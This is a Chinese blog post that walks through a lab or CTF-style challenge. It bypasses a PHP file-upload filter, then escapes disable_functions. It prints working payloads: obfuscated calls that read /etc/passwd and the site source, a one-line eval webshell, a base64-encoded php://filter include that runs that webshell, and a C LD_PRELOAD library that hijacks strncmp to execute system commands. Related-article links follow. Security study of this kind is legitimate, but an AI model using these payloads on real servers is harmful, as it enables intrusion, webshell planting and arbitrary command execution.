绕过文件上传+disabled_function案例

最新推荐文章于 2024-07-30 21:02:40 发布
最新推荐文章于 2024-07-30 21:02:40 发布
阅读量296 收藏
点赞数
分类专栏: 网安 文章标签: php 安全 html5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vt_yjx/article/details/132289151
版权

目录

案例

1.上传文件

2.绕过过滤

3.绕过disable_function

原理

测试

案例

该案例涉及到:

base64绕过过滤

伪协议php://filter的使用

通过LD_PRELOAD绕过disable_function

1.上传文件

前端代码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div class="light">
        <span class="glow">
            <form enctype="multipart/form-data" method="post" action="index.php">
                嘿伙计传个火?!
                <input class="input_file" type="file" name="upload_file" />
                <input class="button" type="submit" name="submit" value="提交" />
            </form>
        </span>
        <div>
    </div>
</body>
</html>

尝试发现,只能上传php文件

 随便上传了几个php文件又发现都被过滤了:

 

这里利用一个php特性,.可以视为+号,所以文件代码这样写:

<?php
echo ("fil"."e_get_c"."ontents")("/etc/passwd");
?>

发现返回了加密后的文件名和路径:

访问后发现可行,

现在要看源码,利用/etc/passwd看方法没有用show_source方便

这里使用show_source

但是要先编码,否则会被过滤拦住:

<?php
base64_decode('c2hvd19zb3VyY2U=')('../index.php');
?>

../是访问上级目录,因为一般情况下index.php不会在uploads目录下

上传后访问弹回的路径,成功看到源码:

2.绕过过滤

        直接写一句话后门

<?php eval($_POST[1]); ?>

然后上传成功,拿到文件名

但是想要执行,反引号被ban了

那就用到php://filter解码一句话后门,然后再结合include:

php://filter/read=convert.base64-decode/resource=可以让后面的内容以php文件执行

include可以让php文件自动执行

那么就可以写成

<?php Includ("php://filter/read=convert.base64-decode/resource=5032242ac3f2c4552f7026dd956f4113.php"); ?>

思路就是利用伪协议让后门可执行,然后利用include自动执行

问题1.include被过滤了

        php函数不区分大小写,所以改成Include即可

问题2.伪协议被过滤了

        将php://filter/read=convert.base64-decode/resource=5032242ac3f2c4552f7026dd956f4113.php

整个进行base64编码即可

最后payload为:

<?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPTUwMzIyNDJhYzNmMmM0NTUyZjcwMjZkZDk1NmY0MTEzLnBocA==")); ?>

直接上传,然后用火狐的hackbar测试post,后门可以使用。

3.绕过disable_function

现在使用蚁剑

正常来讲,这里输入命令是无法返回的,因为disable_function都给禁止了 ,但是环境没有完全搭建所以可以执行

这里就说一下劫持LD_PRELOAD原理

然后直接用docker启一个有disable_function的环境用蚁剑插件测试下结果

原理

      程序的连接可以分为三种:

  • 静态链接:在程序运行之前先将各个目标模块以及所需要的库函数链接成一个完整的可执行程序,之后不再拆开。

  • 装入时动态链接:源程序编译后所得到的一组目标模块,在装入内存时,边装入边链接。

  • 运行时动态链接:原程序编译后得到的目标模块,在程序执行过程中需要用到时才对它进行链接。

        

.so后缀的文件就是动态链接库

这里劫持LD_PRELOAD就是用自己的库覆盖掉原来的,然后执行命令的时候会执行到我们的payload

        具体操作步骤:

  1.先写一个.c文件,包括变量、类型、返回值、返回类型都要与替换的函数完全一致

  2.把.c文件编译成.so动态连接库

  3.把环境变量LD_PRELOAD设置成我们的动态链接库

  4.接下来执行被替换的函数即可

        以id为例:

        .c文件:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload() {
    system("id");
}

int strncmp(const char *__s1, const char *__s2, size_t __n) {    // 这里函数的定义可以根据报错信息进行确定
    if (getenv("LD_PRELOAD") == NULL) {
        return 0;
    }
    unsetenv("LD_PRELOAD");
    payload();
}

编译 gcc -shared -fPIC 文件名.c -o 文件名.so

设置环境变量export LD_PRELOAD=$PWD/xx.so       

然后执行id即可

测试

开启docker:

蚁剑直接连接      

 打开终端测试命令:

 命令都不能使用,这说明都被disable_function拦住了

直接用插件:   

 然后编辑连接:

 

现在命令测试可以成功了:

vt_yjx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
的能绕过disable_functions的插件
06-21
的能绕过disable_functions的插件,插件无法下载问题
插件之绕disable_functions
zlzg007的博客
09-08 7951
插件之绕disable_functions 概述 有些网站会禁用php中的一些危险函数,导致即使上传马上去,也执行不了命令,很典型的就是宝塔的网站。 有个插件专门用于解决这个问题。 绕过的方法有好几种,大多都是针对linux,有一个windows能用,但经过尝试还是不行,所以说如果碰到windows这种情况,就可以直接放弃了。 方法 直接运行插件,选择绕过方式: 然后,直接开始,运行成功后会生成两个文件: 直接使用连接.antproxy.php那个文件,密码还是原来的密码, 就可以命令执行了
绕过disable_function
qq_51770207的博客
09-22 4067
绕过disable_function
利用 LD_PRELOAD劫持动态链接库,绕过 disable_function
qq_68163788的博客
11-30 1308
LD_PRELOAD是一个环境变量,它允许用户在程序加载动态链接库(共享对象)时指定要预先加载的库。这个功能可以用来替换程序中的特定函数,或者添加额外的功能。 使用LD_PRELOAD可以在不修改源代码的情况下,对程序的行为进行修改。这对于调试、性能分析或者添加额外的安全检查非常有用。例如,可以使用LD_PRELOAD来替换标准库中的malloc和free函数,从而实现内存泄漏检测或者统计内存使用情况。 需要注意的是,LD_PRELOAD只对动态链接的程序有效
实战中绕过disable_functions执行命令
jammny
12-11 2359
前言 前几天看到有大佬提到一种小型贷款网站,这种贷款网站从账号的注册到借款的流程都显得很随便,仿佛巴不得直接无条件借钱给你似的,充满“诈骗”的气息。 任意文件上传 看着充满暗示的提示语,我们仿照受害者的思路点击借款: 随意填写借款金额后,会让我们上传身份证信息: 文件上传的时候,发现前端有检验。随手上传了图片木马,并用bp抓包分析。 值得一提的是,在bp抓取到的数据包下面。可以看到有一段base64图片加密了后的数据,经过测试这段数据并不会被后端所检验和使用,也就说可以直接删掉.
PHP绕过】LD_PRELOAD bypass disable_functions
4ut15m's blog
03-03 1516
序 不能执行系统命令的webshell是没有灵魂的. LD_PRELOAD 众所周知,代码在编译成程序的时候有一个过程叫做链接-->将所引用的函数与变量链接到可执行程序中.编译过程中将所有的函数库链接完毕叫做静态链接,而动态链接则是编译过程中不进行链接操作,在程序运行时再动态的载入函数库.不管是静态链接还是动态链接,目的都很明确,载入函数库. LD_PRELOAD是与载入函数库相关的...
windows,linux 下载与安装 与 手动安装插件disable_functions
热门推荐
Sk1y的博客
08-15 1万+
windows,linux下载与安装,disable_functions插件手动安装与使用
实例解析java_+_jQuery_+_json工作过程
04-27
本文通过一个具体的登录功能案例,详细介绍了如何利用Java、jQuery以及JSON来实现简单的登录功能。具体包括了前端验证、数据传输、后端处理等关键步骤。 #### 前端部分 前端主要由HTML页面和JavaScript脚本组成。...
BootStrap文件上传样式超好看【持续更新】
09-02
在本文中,我们将深入探讨如何使用Bootstrap框架来创建美观的文件上传组件。Bootstrap是一个流行的前端开发框架,提供了丰富的样式和组件,使得网站设计更加简洁、响应式和一致。在文件上传方面,Bootstrap提供了...
jQuery插件ajaxfileupload.js实现上传文件
10-22
在本文中,我们将深入探讨如何使用jQuery插件ajaxfileupload.js来实现无刷新的文件上传功能。这个插件是jQuery库的一个扩展,它允许开发者在不刷新整个页面的情况下完成文件的上传操作,从而提供更好的用户体验。 ...
ext-2.3.0+CKEditor 3.0.1+ckfinder_asp_1.4配置详解及工程源码
12-12
CKEDITOR.editorConfig = function( config ) { config.language = 'zh-cn'; //配置语言 config.uiColor = 'DFE8F6'; config.skin = 'office2003'; config.height = 320; config.width = '100%'; config.font...
ficon_css文件_
10-04
`ficon_css` 文件通常指的是一个专门用来定义图标样式的CSS文件,它可以帮助设计师在网页上呈现各种图形和符号,从而提高用户体验和页面的视觉吸引力。 `ficon` 在这里可能是代表“font icon”的缩写,一种常见的...
如何在ctf解题实战中绕过disable_function
qq_47168481的博客
01-30 6954
本文介绍将介绍ctf比赛中遇到的三种绕过disable_function的方法
绕过disable_functions
unexpectedthing的博客
04-28 2302
文章目录前言黑名单绕过利用 LD_PRELOAD 环境变量LD_PRELOAD 简介利用条件劫持 getuid()劫持启动进程演示过程利用ShellShock(CVE-2014-6271)使用条件:原理简述演示过程php-json-bypass使用条件:原理简述利用脚本演示过程php-GC-bypass使用条件:原理简述利用脚本演示过程利用 Backtrace使用条件:原理简述利用脚本利用方法利用 Apache Mod CGI使用条件:原理简述演示过程2020De1CTF通过攻击 PHP-FPM理论:ctf
网络安全绕过MSF的一次渗透测试
2201_75735270的博客
09-08 71
这次渗透的主站是 一个Discuz!3.4 的搭建 违法招piao 网站, 配置有宝塔WAF用 Discuz!ML 3.X 的漏洞进行攻击,但是没有成功发现主站外链会有一个发卡网,引导人们来这充值,是 某某发卡网,而且域名指向也是主站的ip,两个网站在同一个 ,此处忘记截图了网上有通杀payload,写shell的过程在这里省略了1、网络安全学习路线 2、电子书籍(白帽子) 3、安全大厂内部视频 4、100份src文档 5、常见安全面试题 6、ctf大赛经典题目解析 7、全套工具包 8、应急响应笔记。
disable_functions绕过总结
遇事不决冲冲冲
11-19 6523
提要 Linux 中 PHP 环境,已知disable_functions=exec、passthru、popen、proc_open、shell_exec、system请写出两种有可能实现任意命令执行的方式 exec <?phpecho exec('whoami');?> — 执行一个外部程序 passthru <?phppassthru("whoami");?> — 执行外部程序并且显示原始输出
disable_functions的绕过+目录突破+提权
fw的博客
06-23 3738
0x00 正常的操作拿到webshell,在虚拟终端里输入命令都没有反应 在phpinfo里找到disable_functions函数,发现很多命令都被禁用了。 0x01绕过disable_functions 在这里一开始使用了 LD_PRELOAD绕过,发现报错了。 然后使用自带插件成功绕过。 然后到tmp目录查找看看,找到了.sock路径。 运行生成一个.antproxy.phpd文件。 然后连接发现这个绕过只有一会的时间就会被断开,然后想着在上传木马到靶机,进行反弹shell。 0x
RCE和php文件上传
最新发布
m0_71332744的博客
07-30 703
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
Nov+30+16:55:47+localhost+kernel:+ACPI:+LAPIC+(acpi_id[0x21]+lapic_id[0x60]+disabled)
12-01
根据提供的引用内容,可以看出这是内核启动时的一些信息,其中包括了ACPI和LAPIC的相关信息。其中,acpi_id[0x05]表示ACPI ID为0x05,lapic_id[0x32]表示LAPIC ID为0x32,enabled表示已启用。同样地,acpi_id[0x03]表示ACPI ID为0x03,lapic_id[0x22]表示LAPIC ID为0x22,enabled表示已启用。而在提供的引用中,Nov+30+16:55:47+localhost+kernel:+ACPI:+LAPIC+(acpi_id[0x21]+lapic_id[0x60]+disabled)中的disabled表示该LAPIC未启用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值